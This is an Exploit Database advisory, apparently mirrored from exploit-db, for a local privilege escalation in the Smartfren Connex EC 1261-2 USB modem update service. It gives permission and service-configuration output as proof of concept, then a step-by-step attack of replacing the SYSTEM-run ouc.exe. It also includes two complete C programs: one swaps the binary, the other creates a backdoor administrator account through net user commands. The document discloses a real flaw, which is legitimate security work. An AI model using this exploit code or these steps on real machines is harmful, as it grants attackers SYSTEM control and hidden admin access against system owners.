Smartfren Connex EC 1261-2 UI OUC – Local Privilege Escalation

• Exploit Database
• 19 阅读

• 作者： X-Cisadane
  日期： 2012-09-27
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/21547/

• ========================================================================== 
  Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability 
  ==========================================================================
  
  :-------------------------------------------------------------------------------------------------------------------------------------:
  : # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability 
  : # Date : 26 September 2012 
  : # Author : X-Cisadane 
  : # Software Link : http://www.smartfren.com/data/ec1261.html
  : # File Version : 21.005.15.03.836
  : # Category : Desktop (Windows) Applications 
  : # Platform : Win32 & Win64 
  : # Vulnerability : Local Privilege Escalation Vulnerability 
  : # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN) 
  : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
  :-------------------------------------------------------------------------------------------------------------------------------------:
  Summary
  ========
  Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files. 
  Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.
  
  Description
  ===========
  Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability.
  It can be used by a simple user that can change the executable file with a binary of choice. 
  The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges. 
  Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN).
  
  Proof of Concept
  ================
  C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>>cacls ouc.exe
  C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe 	Everyone:F 
   									BUILTIN\Users:F
  	NT AUTHORITY\SYSTEM:(ID)F
  	BUILTIN\Administrators:(ID)F
  
  C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
  TYPE : 110WIN32_OWN_PROCESS (interactive)
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : Smartfren Connex EC1261-2 UI. OUC
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  ----------------------------------------------------------------------------------------------
  The following attack scenario could be used :
  1. An attacker (unprivileged user) rename Smartfren Connex EC1261-2 UI. OUC program file. 
  For example, the Smartfren Connex EC1261-2 UI. OUC program file could be :
  For Win32 ---> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager) 
  For Win64 ---> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
  Rename the file to ouc.exe.old
  2. An attacker copies his malicious executable file (with same name as the old filename of the FILE - ouc.exe) in the same location.
  3. Restart the system.
  After restart attackers malicious file will be executed with SYSTEM privileges.
  
  You can also do it with these simple program :
  ------------------------------------- [ CUT HERE ] -------------------------------------------
  Compile these script below with Dev-C++
  Save in the C:\sploit.cpp
  
  #include <stdio.h>
  #include <windows.h>
  #define DEFAULT_TARGET"C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
  #define DEFAULT_BACKUP"C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
  #define DEFAULT_EXECUTE "C:\\bin.exe"
  int main(int argc, char *argv[])
  {
  
   MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
   CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
   return 0;
  }
   
  
  Compile these script below with Dev-C++
  Save in the C:\bin.cpp
  
  #include <stdio.h>
  #include <windows.h>
  #define CMD "C:\\WINDOWS\\system32\\cmd.exe"
  #define ONE "/C net user xcisadane xcisadane /add"
  #define TWO "/C net localgroup administrators xcisadane /add"
  int main(int argc, char *argv[])
  {
  STARTUPINFO si = {sizeof(STARTUPINFO)};
  PROCESS_INFORMATION pi;
   CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
   CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
   return 0;
  }
  ------------------------------------- [ CUT HERE ] -------------------------------------------
  Execute file sploit.exe that located in C:\
  Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully!
  P.S : For Win32 please change Program Files (x86) to Program Files.